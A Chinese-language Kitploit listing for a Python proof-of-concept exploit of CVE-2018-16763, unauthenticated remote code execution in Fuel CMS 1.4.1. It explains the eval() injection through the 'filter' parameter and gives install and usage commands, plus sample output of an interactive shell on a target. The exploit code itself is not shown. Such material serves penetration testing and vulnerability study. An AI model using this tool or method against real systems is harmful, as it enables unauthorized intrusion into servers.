Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — 用于Fuel CMS 1.4.1中通过`filter`参数进行未认证远程代码执行的Python概念验证,提供一个交互式shell用于命令执行。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

用于Fuel CMS 1.4.1中通过`filter`参数进行未认证远程代码执行的Python概念验证,提供一个交互式shell用于命令执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
15个月前尚未审核

CVE-2018-16763 — Fuel CMS 1.4.1 远程代码执行(PoC)

Fuel CMS 1.4.1 中未经身份验证的 RCE 漏洞。在 /fuel/pages/select/ 端点的 filter 参数未经清理就传递给了 PHP 后端的 eval() 调用,允许通过精心构造的载荷执行任意代码。与盲注入不同,输出 会直接反映 在 HTTP 响应中,因此无需中间文件。


工作原理

  1. 向 /fuel/pages/select/ 发送一个携带特制 filter 载荷的 GET 请求,该载荷调用 PHP 的 system() 执行所需命令。
  2. 使用正则表达式模式从 HTTP 响应中解析出反射输出的内容。
  3. 将命令输出直接返回给交互式 shell。

环境要求

  • Python 3
  • 安装依赖项:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

使用方法

root@kitploit:~
python3 exploit.py -t http://TARGET

示例:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] 测试命令执行...
[+] 目标存在漏洞!输出: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell 已打开。输入 'exit' 或按 Ctrl+C 退出。
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

参考

  • CVE-2018-16763
  • EDB-47138

致谢

  • 发现与最初利用: Syed Sheeraz Ali
  • 清理与交互式 Shell: Esteban Zárate
下载工具